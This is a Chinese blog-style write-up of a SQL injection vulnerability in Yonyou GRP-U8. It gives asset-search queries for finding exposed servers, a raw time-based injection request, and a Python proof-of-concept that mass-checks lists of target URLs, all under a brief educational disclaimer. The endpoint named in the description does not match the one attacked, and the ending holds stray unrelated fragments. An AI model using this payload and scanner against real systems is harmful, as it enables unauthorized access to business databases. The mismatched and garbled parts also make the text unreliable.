声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
用友GRP-U8是一款企业管理软件,其系统dialog_moreUser_check.jsp接口存在SQL注入漏洞。
漏洞复现
1)资产测绘
fofa:app="用友-GRP-U8"
hunter:app.name="用友-GRP-U8"
选秀环节!
2)构造数据包
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
burp!启动!
延迟响应了5041毫秒,存在sql注入~
代码解释:
waitfor delay '0:0:5'这是一个SQL Server特有的命令,它使当前SQL语句暂停执行5秒。通过检查响应时间来验证是否存在SQL注入漏洞。如果服务器响应时间明显增加(在这个例子中是5秒),这可能表明注入的SQL命令被执行了,从而验证了存在SQL注入漏洞。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning# 定义颜色代码,用于控制台输出
RED = '\033[91m'
RESET = '\033[0m'# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def check_vulnerability(url):"""检测指定URL是否存在SQL注入漏洞。参数:- url: 目标网站的URL地址"""try:# 构造攻击URL,尝试触发SQL注入延迟attack_url = url.rstrip('/') + "/u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'--"# 记录请求开始时间start_time = time.time()# 发送GET请求,不验证SSL证书,设置超时时间response = requests.get(attack_url, verify=False, timeout=10)# 计算请求耗时elapsed_time = time.time() - start_time# 如果请求耗时在5到10秒之间,可能存在SQL注入漏洞if 5 < elapsed_time < 10:print(f"{RED}URL [{url}] 可能存在yonyou-grp-u8-bx_dj_check-sql-injection漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except requests.exceptions.Timeout:# 请求超时,可能存在漏洞print(f"URL [{url}] 请求超时,可能存在漏洞")except requests.RequestException as e:# 其他请求异常print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,解析命令行参数并执行漏洞检测。"""parser = argparse.ArgumentParser(description='检测目标地址是否存在yonyou-grp-u8-sql-injection漏洞')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')# 解析命令行参数args = parser.parse_args()# 如果提供了URL参数if args.url:# 确保URL以http或https开头if not args.url.startswith(("http://", "https://")):args.url = "http://" + args.urlcheck_vulnerability(args.url)# 如果提供了文件参数elif args.file:# 读取文件中的URL列表with open(args.file, 'r') as file:urls = file.read().splitlines()for url in urls:# 确保URL以http或https开头if not url.startswith(("http://", "https://")):url = "http://" + urlcheck_vulnerability(url)if __name__ == '__main__':main()
运行截图
:torch.nn.Flatten、torch.flatten())
)
)
)
